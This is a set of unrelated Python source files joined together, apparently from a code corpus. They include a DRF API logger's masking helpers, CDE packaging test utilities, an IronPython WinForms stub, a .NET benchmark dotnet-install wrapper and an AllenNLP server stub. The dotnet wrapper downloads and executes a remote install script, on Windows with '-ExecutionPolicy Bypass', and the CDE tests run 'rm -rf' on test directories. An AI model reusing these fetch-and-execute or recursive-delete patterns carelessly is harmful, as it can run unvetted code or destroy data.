if type(settings.DRF_API_LOGGER_EXCLUDE_KEYS) in (list, tuple):
SENSITIVE_KEYS.extend(settings.DRF_API_LOGGER_EXCLUDE_KEYS)
def get_headers(request=None):
"""
    Function: get_headers(request)
    Description: Return all the HTTP headers from the request
"""
regex = re.compile('^HTTP_')
return dict((regex.sub('', header), value) for (header, value)
in request.META.items() if header.startswith('HTTP_'))
def get_client_ip(request):
try:
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
except:
return ''
def is_api_logger_enabled():
drf_api_logger_database = False
if hasattr(settings, 'DRF_API_LOGGER_DATABASE'):
drf_api_logger_database = settings.DRF_API_LOGGER_DATABASE
drf_api_logger_signal = False
if hasattr(settings, 'DRF_API_LOGGER_SIGNAL'):
drf_api_logger_signal = settings.DRF_API_LOGGER_SIGNAL
return drf_api_logger_database or drf_api_logger_signal
def database_log_enabled():
drf_api_logger_database = False
if hasattr(settings, 'DRF_API_LOGGER_DATABASE'):
drf_api_logger_database = settings.DRF_API_LOGGER_DATABASE
return drf_api_logger_database
def mask_sensitive_data(data):
"""
Hides sensitive keys specified in sensitive_keys settings.
Loops recursively over nested dictionaries.
"""
if type(data) != dict:
return data
for key, value in data.items():
if key in SENSITIVE_KEYS:
data[key] = "***FILTERED***"
if type(value) == dict:
data[key] = mask_sensitive_data(data[key])
if type(value) == list:
data[key] = [mask_sensitive_data(item) for item in data[key]]
return data
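# Minimal usage sketch (illustrative, not part of the original module). Nested dictionaries
# and lists are walked recursively, so matching keys are filtered at any depth:
#
#     payload = {"username": "alice", "password": "secret",
#                "profile": {"token": "abc", "items": [{"refresh": "xyz"}]}}
#     mask_sensitive_data(payload)
#     # -> the password, token and refresh values become "***FILTERED***"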
|
py
|
1a5ee13d4c1494faf5deed12f1f0c4a056771835
|
from .plot_expected_vs_obs import plot_expected_vs_obs
from .plot_factor_spatial import plot_categ_spatial
from .plot_factor_spatial import plot_factor_spatial
from .mapping_video import plot_spatial as plot_spatial
from .plot_in_1D import plot_absolute_abundances_1D
from .plot_in_1D import plot_density_1D
__all__ = [
"plot_density_1D",
"plot_absolute_abundances_1D",
"plot_expected_vs_obs",
"plot_factor_spatial",
"plot_categ_spatial",
"plot_spatial"
]
|
py
|
1a5ee15033a66f12e8c7bb1f9948522be76baf87
|
#!/usr/bin/env python2
# common utilities for all CDE tests
import os, time
from subprocess import *
CDE_BIN = "/home/pgbovine/CDE/cde"
CDE_EXEC = "/home/pgbovine/CDE/cde-exec"
CDE_ROOT_DIR = 'cde-package/cde-root'
def generic_lib_checks():
assert os.path.islink('cde-package/cde-root/lib/libc.so.6')
assert os.readlink('cde-package/cde-root/lib/libc.so.6') == 'libc-2.8.so'
assert os.path.isfile('cde-package/cde-root/lib/ld-linux.so.2')
def run_cde(argv, silent=False):
(stdout, stderr) = Popen([CDE_BIN] + argv, stdout=PIPE, stderr=PIPE).communicate()
if not silent:
if stderr:
print "stderr:", stderr
return (stdout, stderr)
def run_and_cmp_cde_exec(argv, prev_stdout, prev_stderr):
# to make for a tougher test, move the entire cde-package directory to /tmp
# and try to do a cde-exec run
full_pwd = os.getcwd()
full_pwd_renamed = full_pwd + '-renamed'
cur_dirname = os.path.basename(full_pwd)
tmp_test_rootdir = "/tmp/" + cur_dirname
tmp_test_dir = tmp_test_rootdir + '/cde-package/cde-root/' + full_pwd
# careful with these commands! use 'finally' to clean up even after
# exceptions!
try:
(stdout, stderr) = Popen(["rm", "-rf", tmp_test_rootdir], stdout=PIPE, stderr=PIPE).communicate()
assert not stdout and not stderr
(stdout, stderr) = Popen(["cp", "-aR", full_pwd, "/tmp"], stdout=PIPE, stderr=PIPE).communicate()
assert not stdout and not stderr
# rename full_pwd to make it impossible for the new version in /tmp
# to reference already-existing files in full_pwd (a harsher test!)
try:
os.rename(full_pwd, full_pwd_renamed)
# run the cde-exec test in tmp_test_dir
os.chdir(tmp_test_dir)
(stdout, stderr) = Popen([CDE_EXEC] + argv, stdout=PIPE, stderr=PIPE).communicate()
#print '=== prev_stdout:', prev_stdout
#print '=== stdout:', stdout
assert stdout == prev_stdout
#print '=== prev_stderr:', prev_stderr
#print '=== stderr:', stderr
assert stderr == prev_stderr
finally:
# rename it back to be nice :)
os.rename(full_pwd_renamed, full_pwd)
os.chdir(full_pwd) # make sure to chdir back!!!
finally:
# remove the version in tmp
(stdout, stderr) = Popen(["rm", "-rf", tmp_test_rootdir], stdout=PIPE, stderr=PIPE).communicate()
def generic_test_runner(argv, checker_func, skip_generic_lib_checks=False, clear_cde_options=True):
# careful!!!
os.system('rm -rf cde-package')
if clear_cde_options:
os.system('rm -f cde.options')
time.sleep(0.3) # to give os.system some time to work :)
(stdout, stderr) = run_cde(argv)
checker_func()
if not skip_generic_lib_checks:
generic_lib_checks()
run_and_cmp_cde_exec(argv, stdout, stderr)
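# Illustrative sketch (not part of this module): an individual CDE test script would import
# these helpers, define a checker over the generated package, and hand its command line to
# generic_test_runner, which packages the run with `cde`, verifies the package, then replays
# it with `cde-exec` and compares stdout/stderr. The command and path below are hypothetical:
#
#   def my_checker():
#     assert os.path.isfile(CDE_ROOT_DIR + '/etc/hostname')
#   generic_test_runner(['/bin/cat', '/etc/hostname'], my_checker)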
|
py
|
1a5ee44b23d43c0589a0e604399873b189b50d2f
|
class DataGridViewAdvancedBorderStyle(object,ICloneable):
"""
Contains border styles for the cells in a System.Windows.Forms.DataGridView control.
DataGridViewAdvancedBorderStyle()
"""
def Equals(self,other):
"""
Equals(self: DataGridViewAdvancedBorderStyle,other: object) -> bool
Determines whether the specified object is equal to the current
System.Windows.Forms.DataGridViewAdvancedBorderStyle.
other: An System.Object to be compared.
Returns: true if other is a System.Windows.Forms.DataGridViewAdvancedBorderStyle and the values for the
System.Windows.Forms.DataGridViewAdvancedBorderStyle.Top,
System.Windows.Forms.DataGridViewAdvancedBorderStyle.Bottom,
System.Windows.Forms.DataGridViewAdvancedBorderStyle.Left,and
System.Windows.Forms.DataGridViewAdvancedBorderStyle.Right properties are equal to their
counterpart in the current System.Windows.Forms.DataGridViewAdvancedBorderStyle; otherwise,
false.
"""
pass
def GetHashCode(self):
""" GetHashCode(self: DataGridViewAdvancedBorderStyle) -> int """
pass
def ToString(self):
"""
ToString(self: DataGridViewAdvancedBorderStyle) -> str
Returns a string that represents the System.Windows.Forms.DataGridViewAdvancedBorderStyle.
Returns: A string that represents the System.Windows.Forms.DataGridViewAdvancedBorderStyle.
"""
pass
def __eq__(self,*args):
""" x.__eq__(y) <==> x==y """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __ne__(self,*args):
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
def __str__(self,*args):
pass
All=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the border style for all of the borders of a cell.
Get: All(self: DataGridViewAdvancedBorderStyle) -> DataGridViewAdvancedCellBorderStyle
Set: All(self: DataGridViewAdvancedBorderStyle)=value
"""
Bottom=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the style for the bottom border of a cell.
Get: Bottom(self: DataGridViewAdvancedBorderStyle) -> DataGridViewAdvancedCellBorderStyle
Set: Bottom(self: DataGridViewAdvancedBorderStyle)=value
"""
Left=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the style for the left border of a cell.
Get: Left(self: DataGridViewAdvancedBorderStyle) -> DataGridViewAdvancedCellBorderStyle
Set: Left(self: DataGridViewAdvancedBorderStyle)=value
"""
Right=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the style for the right border of a cell.
Get: Right(self: DataGridViewAdvancedBorderStyle) -> DataGridViewAdvancedCellBorderStyle
Set: Right(self: DataGridViewAdvancedBorderStyle)=value
"""
Top=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the style for the top border of a cell.
Get: Top(self: DataGridViewAdvancedBorderStyle) -> DataGridViewAdvancedCellBorderStyle
Set: Top(self: DataGridViewAdvancedBorderStyle)=value
"""
|
py
|
1a5ee45fa9bb69d97a95caa0154875dfa6b9801e
|
#!/usr/bin/env python3
"""
Contains the functionality around DotNet Cli.
"""
from argparse import Action, ArgumentParser, ArgumentTypeError, ArgumentError
from collections import namedtuple
from glob import iglob
from json import loads
from logging import getLogger
from os import chmod, environ, listdir, makedirs, path, pathsep
from re import search
from shutil import rmtree
from stat import S_IRWXU
from subprocess import check_output
from sys import argv, platform
from typing import Tuple
from urllib.parse import urlparse
from urllib.request import urlopen, urlretrieve
from performance.common import get_repo_root_path
from performance.common import get_tools_directory
from performance.common import push_dir
from performance.common import RunCommand
from performance.common import validate_supported_runtime
from performance.logger import setup_loggers
from channel_map import ChannelMap
def info(verbose: bool) -> None:
"""
Executes `dotnet --info` in order to get the .NET Core information from the
dotnet executable.
"""
cmdline = ['dotnet', '--info']
RunCommand(cmdline, verbose=verbose).run()
def __log_script_header(message: str):
message_length = len(message)
getLogger().info('-' * message_length)
getLogger().info(message)
getLogger().info('-' * message_length)
CSharpProjFile = namedtuple('CSharpProjFile', [
'file_name',
'working_directory'
])
class FrameworkAction(Action):
'''
Used by the ArgumentParser to represent the information needed to parse the
supported .NET frameworks argument from the command line.
'''
def __call__(self, parser, namespace, values, option_string=None):
if values:
setattr(namespace, self.dest, list(set(values)))
@staticmethod
def get_target_framework_moniker(framework: str) -> str:
'''
        Translates framework name to target framework moniker (TFM).
        To run CoreRT benchmarks we need to run the host BDN process as the
        latest .NET Core; the host process will build and run the CoreRT
        benchmarks.
'''
return 'netcoreapp5.0' if framework == 'corert' else framework
@staticmethod
def get_target_framework_monikers(frameworks: list) -> list:
'''
Translates framework names to target framework monikers (TFM)
Required to run CoreRT benchmarks where the host process must be .NET
Core, not CoreRT.
'''
monikers = [
FrameworkAction.get_target_framework_moniker(framework)
for framework in frameworks
]
# ['netcoreapp5.0', 'corert'] should become ['netcoreapp5.0']
return list(set(monikers))
class VersionsAction(Action):
'''
    Argument parser helper class used to validate the dotnet-versions input.
'''
def __call__(self, parser, namespace, values, option_string=None):
if values:
for version in values:
if not search(r'^\d\.\d+\.\d+', version):
raise ArgumentTypeError(
'Version "{}" is in the wrong format'.format(version))
setattr(namespace, self.dest, values)
class CompilationAction(Action):
'''
Tiered: (Default)
NoTiering: Tiering is disabled, but R2R code is not disabled.
This includes R2R code, useful for comparison against Tiered and
FullyJittedNoTiering for changes to R2R code or tiering.
Default: Don't set any environment variables. Use what the compiler views
as the default.
FullyJittedNoTiering: Tiering and R2R are disabled.
This is JIT-only, useful for comparison against Tiered and NoTiering
for changes to R2R code or tiering.
MinOpt:
Uses minopt-JIT for methods that do not have pregenerated code, useful
for startup time comparisons in scenario benchmarks that include a
startup time measurement (probably not for microbenchmarks), probably
not useful for a PR.
For PRs it is recommended to kick off a Tiered run, and being able to
manually kick-off NoTiering and FullyJittedNoTiering modes when needed.
'''
# TODO: Would 'Default' make sense for .NET Framework / CoreRT / Mono?
# TODO: Should only be required for benchmark execution under certain tools
TIERED = 'Tiered'
NO_TIERING = 'NoTiering'
DEFAULT = 'Default'
FULLY_JITTED_NO_TIERING = 'FullyJittedNoTiering'
MIN_OPT = 'MinOpt'
def __call__(self, parser, namespace, values, option_string=None):
if values:
if values not in CompilationAction.modes():
raise ArgumentTypeError('Unknown mode: {}'.format(values))
setattr(namespace, self.dest, values)
@staticmethod
def __set_mode(mode: str) -> None:
# Remove potentially set environments.
COMPLUS_ENVIRONMENTS = [
'COMPlus_JITMinOpts',
'COMPlus_ReadyToRun',
'COMPlus_TieredCompilation',
'COMPlus_ZapDisable',
]
for complus_environment in COMPLUS_ENVIRONMENTS:
if complus_environment in environ:
environ.pop(complus_environment)
# Configure .NET Runtime
if mode == CompilationAction.TIERED:
environ['COMPlus_TieredCompilation'] = '1'
elif mode == CompilationAction.NO_TIERING:
environ['COMPlus_TieredCompilation'] = '0'
elif mode == CompilationAction.FULLY_JITTED_NO_TIERING:
environ['COMPlus_ReadyToRun'] = '0'
environ['COMPlus_TieredCompilation'] = '0'
environ['COMPlus_ZapDisable'] = '1'
elif mode == CompilationAction.MIN_OPT:
environ['COMPlus_JITMinOpts'] = '1'
environ['COMPlus_TieredCompilation'] = '0'
elif mode != CompilationAction.DEFAULT:
raise ArgumentTypeError('Unknown mode: {}'.format(mode))
@staticmethod
def validate(usr_mode: str) -> str:
'''Validate user input.'''
requested_mode = None
for mode in CompilationAction.modes():
if usr_mode.casefold() == mode.casefold():
requested_mode = mode
break
if not requested_mode:
raise ArgumentTypeError('Unknown mode: {}'.format(usr_mode))
CompilationAction.__set_mode(requested_mode)
return requested_mode
@staticmethod
def modes() -> list:
'''Available .NET Performance modes.'''
return [
CompilationAction.DEFAULT,
CompilationAction.TIERED,
CompilationAction.NO_TIERING,
CompilationAction.FULLY_JITTED_NO_TIERING,
CompilationAction.MIN_OPT
]
@staticmethod
def noenv() -> str:
'''Default .NET performance mode.'''
return CompilationAction.modes()[0] # No environment set
@staticmethod
def help_text() -> str:
'''Gets the help string describing the different compilation modes.'''
return '''Different compilation modes that can be set to change the
.NET compilation behavior. The default configurations have changed between
    releases of .NET. These flags help ensure consistency when running
more than one runtime. The different modes are: {}: no
environment variables are set; {}: tiering is enabled.
{}: tiering is disabled, but includes R2R code, and it is useful for
comparison against Tiered; {}: This is JIT-only, useful for comparison
against Tiered and NoTier for changes to R2R code or tiering; {}: uses
minopt-JIT for methods that do not have pregenerated code, and useful
for startup time comparisons in scenario benchmarks that include a
startup time measurement (probably not for microbenchmarks), probably
not useful for a PR.'''.format(
CompilationAction.DEFAULT,
CompilationAction.TIERED,
CompilationAction.NO_TIERING,
CompilationAction.FULLY_JITTED_NO_TIERING,
CompilationAction.MIN_OPT
)
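# Illustrative summary (not part of the original file) of what CompilationAction.__set_mode
# above exports for each mode, after clearing any pre-existing COMPlus_* variables:
#   Tiered               -> COMPlus_TieredCompilation=1
#   NoTiering            -> COMPlus_TieredCompilation=0
#   FullyJittedNoTiering -> COMPlus_ReadyToRun=0, COMPlus_TieredCompilation=0, COMPlus_ZapDisable=1
#   MinOpt               -> COMPlus_JITMinOpts=1, COMPlus_TieredCompilation=0
#   Default              -> no COMPlus_* variables are set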
class CSharpProject:
'''
This is a class wrapper around the `dotnet` command line interface.
Remark: It assumes dotnet is already in the PATH.
'''
def __init__(self, project: CSharpProjFile, bin_directory: str):
if not project.file_name:
raise TypeError('C# file name cannot be null.')
if not project.working_directory:
raise TypeError('C# working directory cannot be null.')
if not bin_directory:
raise TypeError('bin folder cannot be null.')
self.__csproj_file = path.abspath(project.file_name)
self.__working_directory = path.abspath(project.working_directory)
self.__bin_directory = bin_directory
if not path.isdir(self.__working_directory):
raise ValueError(
'Specified working directory: {}, does not exist.'.format(
self.__working_directory
)
)
if not path.isfile(self.__csproj_file):
raise ValueError(
'Specified project file: {}, does not exist.'.format(
self.__csproj_file
)
)
@property
def working_directory(self) -> str:
'''Gets the working directory for the dotnet process to be started.'''
return self.__working_directory
@property
def csproj_file(self) -> str:
'''Gets the project file to run the dotnet cli against.'''
return self.__csproj_file
@property
def project_name(self) -> str:
'''Gets the project name.'''
return path.splitext(path.basename(self.__csproj_file))[0]
@property
def bin_path(self) -> str:
'''Gets the directory in which the built binaries will be placed.'''
return self.__bin_directory
def restore(self,
packages_path: str,
verbose: bool,
runtime_identifier: str = None) -> None:
'''
Calls dotnet to restore the dependencies and tools of the specified
project.
Keyword arguments:
packages_path -- The directory to restore packages to.
'''
if not packages_path:
raise TypeError('Unspecified packages directory.')
cmdline = [
'dotnet', 'restore',
self.csproj_file,
'--packages', packages_path
]
if runtime_identifier:
cmdline += ['--runtime', runtime_identifier]
RunCommand(cmdline, verbose=verbose).run(
self.working_directory)
def build(self,
configuration: str,
verbose: bool,
packages_path: str,
target_framework_monikers: list = None,
output_to_bindir: bool = False,
runtime_identifier: str = None,
*args) -> None:
'''Calls dotnet to build the specified project.'''
if not target_framework_monikers: # Build all supported frameworks.
cmdline = [
'dotnet', 'build',
self.csproj_file,
'--configuration', configuration,
'--no-restore',
"/p:NuGetPackageRoot={}".format(packages_path),
]
if output_to_bindir:
cmdline = cmdline + ['--output', self.__bin_directory]
if runtime_identifier:
cmdline = cmdline + ['--runtime', runtime_identifier]
if args:
cmdline = cmdline + list(args)
RunCommand(cmdline, verbose=verbose).run(
self.working_directory)
else: # Only build specified frameworks
for target_framework_moniker in target_framework_monikers:
cmdline = [
'dotnet', 'build',
self.csproj_file,
'--configuration', configuration,
'--framework', target_framework_moniker,
'--no-restore',
"/p:NuGetPackageRoot={}".format(packages_path),
]
if output_to_bindir:
cmdline = cmdline + ['--output', self.__bin_directory]
if runtime_identifier:
cmdline = cmdline + ['--runtime', runtime_identifier]
if args:
cmdline = cmdline + list(args)
RunCommand(cmdline, verbose=verbose).run(
self.working_directory)
@staticmethod
def new(template: str,
output_dir: str,
bin_dir: str,
verbose: bool,
working_directory: str,
force: bool = False,
exename: str = None,
language: str = None
):
'''
Creates a new project with the specified template
'''
cmdline = [
'dotnet', 'new',
template,
'--output', output_dir,
'--no-restore'
]
if force:
cmdline += ['--force']
if exename:
cmdline += ['--name', exename]
if language:
cmdline += ['--language', language]
RunCommand(cmdline, verbose=verbose).run(
working_directory
)
# the file could be any project type. let's guess.
project_type = 'csproj'
if language == 'vb':
project_type = 'vbproj'
return CSharpProject(CSharpProjFile(path.join(output_dir, '%s.%s' % (exename or output_dir, project_type)),
working_directory),
bin_dir)
def publish(self,
configuration: str,
output_dir: str,
verbose: bool,
packages_path,
target_framework_moniker: str = None,
runtime_identifier: str = None,
*args
) -> None:
'''
Invokes publish on the specified project
'''
cmdline = [
'dotnet', 'publish',
self.csproj_file,
'--configuration', configuration,
'--output', output_dir,
"/p:NuGetPackageRoot={}".format(packages_path)
]
if runtime_identifier:
cmdline += ['--runtime', runtime_identifier]
if target_framework_moniker:
cmdline += ['--framework', target_framework_moniker]
if args:
cmdline = cmdline + list(args)
RunCommand(cmdline, verbose=verbose).run(
self.working_directory
)
@staticmethod
def __print_complus_environment() -> None:
getLogger().info('-' * 50)
getLogger().info('Dumping COMPlus environment:')
COMPLUS_PREFIX = 'COMPlus'
for env in environ:
if env[:len(COMPLUS_PREFIX)].lower() == COMPLUS_PREFIX.lower():
getLogger().info(' "%s=%s"', env, environ[env])
getLogger().info('-' * 50)
def run(self,
configuration: str,
target_framework_moniker: str,
verbose: bool,
*args) -> None:
'''
Calls dotnet to run a .NET project output.
'''
CSharpProject.__print_complus_environment()
cmdline = [
'dotnet', 'run',
'--project', self.csproj_file,
'--configuration', configuration,
'--framework', target_framework_moniker,
'--no-restore', '--no-build',
]
if args:
cmdline = cmdline + list(args)
RunCommand(cmdline, verbose=verbose).run(
self.working_directory)
def get_framework_version(framework: str) -> str:
groups = search(r"^netcoreapp(\d)\.(\d)$", framework)
if not groups:
raise ValueError("Unknown target framework: {}".format(framework))
FrameworkVersion = namedtuple('FrameworkVersion', ['major', 'minor'])
version = FrameworkVersion(int(groups.group(1)), int(groups.group(2)))
return version
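# Illustrative example (not part of the original file): get_framework_version only accepts
# the single-digit "netcoreappX.Y" form, e.g.
#   get_framework_version('netcoreapp3.1') -> FrameworkVersion(major=3, minor=1)
# while anything that does not match r"^netcoreapp(\d)\.(\d)$" raises ValueError.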
def get_base_path(dotnet_path: str = None) -> str:
"""Gets the dotnet Host version from the `dotnet --info` command."""
if not dotnet_path:
dotnet_path = 'dotnet'
output = check_output([dotnet_path, '--info'])
for line in output.splitlines():
decoded_line = line.decode('utf-8')
# The .NET Command Line Tools `--info` had a different output in 2.0
        # This line seems common in all CLI versions, so we can use the base path to
# get information about the .NET SDK/Runtime
groups = search(r"^ +Base Path\: +(.+)$", decoded_line)
if groups:
break
if not groups:
raise RuntimeError(
'Did not find "Base Path:" entry on the `dotnet --info` command'
)
return groups.group(1)
def get_sdk_path(dotnet_path: str = None) -> str:
base_path = get_base_path(dotnet_path)
sdk_path = path.abspath(path.join(base_path, '..'))
return sdk_path
def get_dotnet_path() -> str:
base_path = get_base_path(None)
dotnet_path = path.abspath(path.join(base_path, '..', '..'))
return dotnet_path
def get_dotnet_version(
framework: str,
dotnet_path: str = None,
sdk_path: str = None) -> str:
version = get_framework_version(framework)
sdk_path = get_sdk_path(dotnet_path) if sdk_path is None else sdk_path
sdks = [
d for d in listdir(sdk_path) if path.isdir(path.join(sdk_path, d))
]
sdks.sort(reverse=True)
# Determine the SDK being used.
# Attempt 1: Try to use exact match.
sdk = next((f for f in sdks if f.startswith(
"{}.{}".format(version.major, version.minor))), None)
if not sdk:
# Attempt 2: Increase the minor version by 1 and retry.
sdk = next((f for f in sdks if f.startswith(
"{}.{}".format(version.major, version.minor + 1))), None)
if not sdk:
sdk = next((f for f in sdks if f.startswith(
"{}.{}".format('5', '0'))), None)
if not sdk:
raise RuntimeError(
"Unable to determine the .NET SDK used for {}".format(framework)
)
return sdk
def get_dotnet_sdk(
framework: str,
dotnet_path: str = None,
sdk: str = None) -> str:
"""Gets the dotnet Host commit sha from the `dotnet --info` command."""
sdk_path = get_sdk_path(dotnet_path)
sdk = get_dotnet_version(framework, dotnet_path,
sdk_path) if sdk is None else sdk
with open(path.join(sdk_path, sdk, '.version')) as sdk_version_file:
return sdk_version_file.readline().strip()
raise RuntimeError("Unable to retrieve information about the .NET SDK.")
def get_repository(repository: str) -> Tuple[str, str]:
url_path = urlparse(repository).path
tokens = url_path.split("/")
if len(tokens) != 3:
raise ValueError('Unable to determine owner and repo from url.')
owner = tokens[1]
repo = tokens[2]
return owner, repo
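# Illustrative example (not part of the original file): for the repository URL
# "https://github.com/dotnet/performance", urlparse().path is "/dotnet/performance", which
# splits into ['', 'dotnet', 'performance'], so get_repository returns ('dotnet', 'performance').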
def get_commit_date(
framework: str,
commit_sha: str,
repository: str = None
) -> str:
'''
Gets the .NET Core committer date using the GitHub Web API from the
repository.
'''
if not framework:
raise ValueError('Target framework was not defined.')
if not commit_sha:
raise ValueError('.NET Commit sha was not defined.')
url = None
urlformat = 'https://api.github.com/repos/%s/%s/commits/%s'
if repository is None:
# The origin of the repo where the commit belongs to has changed
# between release. Here we attempt to naively guess the repo.
core_sdk_frameworks = ['netcoreapp3.0', 'netcoreapp3.1', 'netcoreapp5.0']
repo = 'core-sdk' if framework in core_sdk_frameworks else 'cli'
url = urlformat % ('dotnet', repo, commit_sha)
else:
owner, repo = get_repository(repository)
url = urlformat % (owner, repo, commit_sha)
build_timestamp = None
with urlopen(url) as response:
getLogger().info("Commit: %s", url)
item = loads(response.read().decode('utf-8'))
build_timestamp = item['commit']['committer']['date']
if not build_timestamp:
raise RuntimeError(
'Could not get timestamp for commit %s' % commit_sha)
return build_timestamp
def get_build_directory(
bin_directory: str,
project_name: str,
configuration: str,
        target_framework_moniker: str) -> str:
    '''
    Gets the output directory where the built artifacts are placed,
    relative to the specified bin_directory.
'''
with push_dir(bin_directory):
return path.join(
bin_directory,
__find_build_directory(
configuration=configuration,
project_name=project_name,
target_framework_moniker=target_framework_moniker,
)
)
def __find_build_directory(
configuration: str,
project_name: str,
target_framework_moniker: str) -> str:
'''
    Attempts to get the output directory where the built artifacts are
    placed, relative to the current working directory.
'''
pattern = '**/{ProjectName}/**/{Configuration}/{TargetFramework}'.format(
ProjectName=project_name,
Configuration=configuration,
TargetFramework=target_framework_moniker
)
for path_name in iglob(pattern, recursive=True):
if path.isdir(path_name):
return path_name
raise ValueError(
'Unable to determine directory for the specified pattern.')
def __get_directory(architecture: str) -> str:
'''Gets the default directory where dotnet is to be installed.'''
return path.join(get_tools_directory(), 'dotnet', architecture)
def remove_dotnet(architecture: str) -> str:
'''
Removes the dotnet installed in the tools directory associated with the
specified architecture.
'''
rmtree(__get_directory(architecture))
def shutdown_server(verbose:bool) -> None:
'''
Shuts down the dotnet server
'''
cmdline = [
'dotnet', 'build-server', 'shutdown'
]
RunCommand(cmdline, verbose=verbose).run(
get_repo_root_path())
def install(
architecture: str,
channels: list,
versions: str,
verbose: bool,
install_dir: str = None) -> None:
'''
Downloads dotnet cli into the tools folder.
'''
__log_script_header("Downloading DotNet Cli")
if not install_dir:
install_dir = __get_directory(architecture)
if not path.exists(install_dir):
makedirs(install_dir)
getLogger().info("DotNet Install Path: '%s'", install_dir)
# Download appropriate dotnet install script
dotnetInstallScriptExtension = '.ps1' if platform == 'win32' else '.sh'
dotnetInstallScriptName = 'dotnet-install' + dotnetInstallScriptExtension
url = 'https://dot.net/v1/'
dotnetInstallScriptUrl = url + dotnetInstallScriptName
dotnetInstallScriptPath = path.join(install_dir, dotnetInstallScriptName)
getLogger().info('Downloading %s', dotnetInstallScriptUrl)
urlretrieve(dotnetInstallScriptUrl, dotnetInstallScriptPath)
if platform != 'win32':
chmod(dotnetInstallScriptPath, S_IRWXU)
dotnetInstallInterpreter = [
'powershell.exe',
'-NoProfile',
'-ExecutionPolicy', 'Bypass',
dotnetInstallScriptPath
] if platform == 'win32' else [dotnetInstallScriptPath]
# If Version is supplied, pull down the specified version
common_cmdline_args = dotnetInstallInterpreter + [
'-InstallDir', install_dir,
'-Architecture', architecture
]
# Install Runtime/SDKs
if versions:
for version in versions:
cmdline_args = common_cmdline_args + ['-Version', version]
RunCommand(cmdline_args, verbose=verbose).run(
get_repo_root_path()
)
# Only check channels if versions are not supplied.
# When we supply a version, but still pull down with -Channel, we will use
# whichever sdk is newer. So if we are trying to check an older version,
# or if there is a new version between when we start a run and when we actually
# run, we will be testing the "wrong" version, ie, not the version we specified.
if (not versions) and channels:
for channel in channels:
cmdline_args = common_cmdline_args + ['-Channel', channel]
RunCommand(cmdline_args, verbose=verbose).run(
get_repo_root_path()
)
# Set DotNet Cli environment variables.
environ['DOTNET_CLI_TELEMETRY_OPTOUT'] = '1'
environ['DOTNET_MULTILEVEL_LOOKUP'] = '0'
environ['UseSharedCompilation'] = 'false'
environ['DOTNET_ROOT'] = install_dir
# Add installed dotnet cli to PATH
environ["PATH"] = install_dir + pathsep + environ["PATH"]
# If we have copied dotnet from a different machine, then it may not be
# marked as executable. Fix this.
if platform != 'win32':
chmod(path.join(install_dir, 'dotnet'), S_IRWXU)
def __add_arguments(parser: ArgumentParser) -> ArgumentParser:
'''
Adds new arguments to the specified ArgumentParser object.
'''
if not isinstance(parser, ArgumentParser):
raise TypeError('Invalid parser.')
SUPPORTED_ARCHITECTURES = [
'x64', # Default architecture
'x86',
'arm',
'arm64',
]
parser.add_argument(
'--architecture',
dest='architecture',
required=False,
default=SUPPORTED_ARCHITECTURES[0],
choices=SUPPORTED_ARCHITECTURES,
help='Architecture of DotNet Cli binaries to be installed.'
)
parser.add_argument(
'--dotnet-versions',
dest="dotnet_versions",
required=False,
nargs='+',
default=[],
action=VersionsAction,
help='Version of the dotnet cli to install in the A.B.C format'
)
return parser
def add_arguments(parser: ArgumentParser) -> ArgumentParser:
'''
Adds new arguments to the specified ArgumentParser object.
'''
parser = __add_arguments(parser)
# .NET Compilation modes.
parser.add_argument(
'--dotnet-compilation-mode',
dest='dotnet_compilation_mode',
required=False,
action=CompilationAction,
choices=CompilationAction.modes(),
default=CompilationAction.noenv(),
type=CompilationAction.validate,
help='{}'.format(CompilationAction.help_text())
)
return parser
def __process_arguments(args: list):
parser = ArgumentParser(
description='DotNet Cli wrapper.',
allow_abbrev=False
)
subparsers = parser.add_subparsers(
title='Subcommands',
description='Supported DotNet Cli subcommands',
dest='install',
)
subparsers.required = True
install_parser = subparsers.add_parser(
'install',
allow_abbrev=False,
help='Installs dotnet cli',
)
install_parser.add_argument(
'--channels',
dest='channels',
required=False,
nargs='+',
default=['master'],
choices= ChannelMap.get_supported_channels(),
help='Download DotNet Cli from the Channel specified.'
)
install_parser = __add_arguments(install_parser)
# private install arguments.
install_parser.add_argument(
'--install-dir',
dest='install_dir',
required=False,
type=str,
help='''Path to where to install dotnet. Note that binaries will be '''
'''placed directly in a given directory.''',
)
install_parser.add_argument(
'-v', '--verbose',
required=False,
default=False,
action='store_true',
help='Turns on verbosity (default "False")',
)
return parser.parse_args(args)
def __main(args: list) -> int:
validate_supported_runtime()
args = __process_arguments(args)
setup_loggers(verbose=args.verbose)
install(
architecture=args.architecture,
channels=args.channels,
versions=args.dotnet_versions,
verbose=args.verbose,
install_dir=args.install_dir,
)
if __name__ == "__main__":
__main(argv[1:])
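# Example invocation (illustrative; the script file name is an assumption): install the x64
# dotnet cli from the default channel into the default tools directory with verbose logging:
#   python dotnet.py install --architecture x64 -v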
|
py
|
1a5ee49398cef842d883f655125bd7310a7c4ba8
|
"""
A `Flask <http://flask.pocoo.org/>`_ server for serving predictions
from a single AllenNLP model. It also includes a very, very bare-bones
web front-end for exploring predictions (or you can provide your own).
For example, if you have your own predictor and model in the `my_stuff` package,
and you want to use the default HTML, you could run this like
```
python -m allennlp.service.server_simple \
--archive-path allennlp/tests/fixtures/bidaf/serialization/model.tar.gz \
--predictor machine-comprehension \
--title "Demo of the Machine Comprehension Text Fixture" \
--field-name question --field-name passage
```
"""
from typing import List, Callable
import argparse
import json
import logging
import os
from string import Template
import sys
import base64
import io
from flask import (Flask, Response, flash, jsonify, redirect, request,
                   send_file, send_from_directory, url_for)
from werkzeug.utils import secure_filename
from flask_cors import CORS
from gevent.pywsgi import WSGIServer
import numpy as np
import cv2
from PIL import Image
from allennlp.common import JsonDict
from allennlp.common.checks import check_for_gpu
from allennlp.common.util import import_submodules
from allennlp.models.archival import load_archive
from allennlp.predictors import Predictor
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class ServerError(Exception):
status_code = 400
